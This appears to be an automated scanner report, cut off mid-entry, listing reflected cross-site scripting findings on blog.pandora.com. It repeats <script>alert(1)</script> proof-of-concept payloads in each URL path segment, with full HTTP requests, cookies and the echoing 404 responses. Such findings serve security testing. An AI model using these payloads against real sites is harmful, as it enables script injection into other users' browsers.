<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 367 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
